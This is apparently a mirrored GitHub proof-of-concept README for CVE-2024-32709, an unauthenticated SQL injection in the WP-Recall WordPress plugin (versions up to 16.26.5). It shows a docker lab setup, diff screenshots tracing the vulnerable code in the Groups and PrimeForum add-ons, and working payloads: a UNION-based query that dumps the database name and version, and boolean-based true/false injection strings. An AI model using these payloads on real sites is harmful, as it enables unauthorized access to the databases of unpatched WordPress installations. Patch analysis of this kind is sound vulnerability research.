CVE-2024-32709 PoC — WordPress plugin WP-Recall SQL注入漏洞

来源

关联漏洞

介绍

# CVE-2024-32709-Poc
WP-Recall – Registration, Profile, Commerce & More <= 16.26.5 - Unauthenticated SQL Injection
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recall/wp-recall-registration-profile-commerce-more-16265-unauthenticated-sql-injection

Build wordpress: docker-compose -f stack.yml up

Diff wp-recall.16.26.5 vs wp-recall.16.26.6
- File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php (Add-on Groups) 
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/511b6a50-f3c1-46a1-9255-c17ca6a3db25)

- File: wp-recall\add-on\prime-forum\classes\class-prime-query.php (Add-on PrimeForum)
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/17374412-1785-479a-935b-6dae5bd09628)

- File: wp-recall\add-on\rating-system\core.php (Add on Rating System)
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/29caf464-9806-4629-a54f-ce23bdcfe91f)

Note: After install wp-recall Default Config
- Add-on Groups default: Inactive
- Add-on PrimeForum default: Inactive
- Add-on Rating System default: Active
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/a85b594d-8834-4d5e-903b-c437a672a672)


### Exploit Unauthenticated SQL Injection Add-on Groups (Require status: Active)
Step 1 File: wp-recall\add-on\groups\classes\class-rcl-groups-list.php
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/a17a621d-0d46-4a95-9956-07ca25c9af15)
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/1dfbfa19-4892-4425-9030-60f2a45bebfe)

Step 2: Search Initialize the object with class `Rcl_Groups_List` with keyword "new Rcl_Groups_List("
- File: add-on\groups\shortcodes.php
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/403602b0-bcc8-48c0-bf78-67e3450a8e83)

Step 3: Search for functions that call the function rcl_get_grouplist
- File: add-on\groups\index.php
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/bcc8eb18-ac54-4661-a85c-6a0ba5d85ed7)
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/7ae255a2-3dfd-415d-8580-b93a42576d30)

### Payload: ``` <Host>/account/?user=1&tab=groups&group-name=p'+or+'%'='%'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat("Database:",database(),0x7c,"Version:",version()),13--+- ```
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/1d12761c-291c-410f-a0f1-f627c902d3e5)

### Exploit Unauthenticated SQL Injection Add-on PrimeForum (Require status: Active)
Step 1 File: wp-recall\add-on\prime-forum\classes\class-prime-query.php => function setup_child_items()
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/c12fae0c-d071-4f90-b560-bb9959657a75)

Step 2: Search Initialize the object with class `PrimeQuery` with keyword "new PrimeQuery("
- File: add-on\prime-forum\index.php
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/4899cc05-e2e7-441e-8557-cd8b11654e71)

- File: wp-recall\add-on\prime-forum\classes\class-prime-query.php
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/c48f6aab-c32c-4c04-893f-77e2afc187a4)

### Exploit Boolean-based SQL injection
Payload condition true: ``` /forum/?fs=.%'+or+if(1=1,'%',1)=' ```
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/2ffe72eb-59c5-4a38-b817-2d6520632a01)

Payload condition false: ``` /forum/?fs=.%'+or+if(1=2,'%',1)=' ```
![image](https://github.com/truonghuuphuc/CVE-2024-32709-Poc/assets/20487674/3b43180d-dd15-4464-8b80-69110911028a)

### Exploit Add-on Rating System: (Comming Soon) ```[ratinglist days="{injection}"] ```

文件快照

 [4.0K]  /data/pocs/e74de20ce44f4d468fa3d02e81ebd554aa109672
├── [3.6K]  README.md
├── [ 607]  stack.yml
├── [1.8M]  wp-recall.16.26.5.zip
└── [1.8M]  wp-recall.16.26.6.zip

0 directories, 4 files

备注